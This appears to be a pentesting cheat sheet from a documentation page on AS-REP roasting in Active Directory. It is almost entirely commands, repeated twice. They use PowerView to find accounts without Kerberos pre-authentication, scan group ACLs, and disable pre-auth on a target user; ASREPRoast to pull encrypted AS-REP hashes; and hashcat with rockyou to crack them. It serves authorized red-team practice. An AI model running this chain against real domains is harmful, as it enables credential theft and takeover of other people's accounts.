🟢AS-REPS Roasting
. .\Powerview_dev.ps1Enumerating accounts with Kerberos pre-auth disabled
Get-DomainUser -PreauthNotRequired -VerboseGet-DomainUser -PreauthNotRequired -verbose | select samaccountnameEnumerate permissions for group
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | flSet pre-auth not required
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -VerboseRequest encrypted AS-REP
. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -VerboseEnumerate all users with Kerberos pre-auth disabled and request a hash
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | flCrack the hash with hashcat
Hashcat -a 0 -m 18200 hash.txt rockyou.txtActive Directory Kerberos Enumeration and Modification
Enumerating Accounts with Disabled Kerberos Pre-Authentication
First, load the PowerView PowerShell module:
. .\Powerview_dev.ps1Then, retrieve all users with pre-authentication not required, using:
Get-DomainUser -PreauthNotRequired -VerboseOr, list only their usernames:
Get-DomainUser -PreauthNotRequired -verbose | select samaccountnameEnumerating Permissions for a Group
To find permissions for a specific group:
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"}For a detailed list:
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match "<groupname>"} | select IdentityReference, ObjectDN, ActiveDirectoryRights | flDisabling Kerberos Pre-Authentication for a User
Load the PowerView script and run:
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -VerboseRequesting Encrypted AS-REP for a User
After loading the ASREPRoast script:
. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -VerboseRoasting Users with Pre-Auth Disabled
To enumerate and roast all users:
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | flCracking the Hash
Finally, crack the retrieved hash using hashcat:
Hashcat -a 0 -m 18200 hash.txt rockyou.txtLast updated
Was this helpful?